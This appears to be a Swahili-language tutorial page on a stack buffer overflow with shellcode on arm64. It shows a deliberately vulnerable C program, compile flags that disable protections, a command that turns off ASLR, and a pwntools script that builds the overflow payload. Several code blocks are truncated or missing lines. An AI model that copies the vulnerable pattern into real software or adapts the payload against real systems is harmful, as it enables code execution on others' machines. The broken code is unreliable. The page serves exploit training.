Stack Shellcode - arm64

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Pata utangulizi wa arm64 katika:


#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability

int main() {
return 0;

Tengeneza bila pie, canary na nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

Hakuna ASLR & Hakuna canary - Stack Overflow

Ili kuzuia ASLR tekeleza:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Ili kupata kipimo cha bof angalia kiungo hiki.


from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload

# Drop to an interactive session

Jambo pekee "gumu" kupata hapa ingekuwa anwani katika stack ya kuita. Katika kesi yangu nilitengeneza exploit na anwani iliyopatikana kwa kutumia gdb, lakini kisha wakati wa ku exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).

Nilifungua core file iliyotengenezwa (gdb ./bog ./core) na kuangalia anwani halisi ya mwanzo wa shellcode.

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Last updated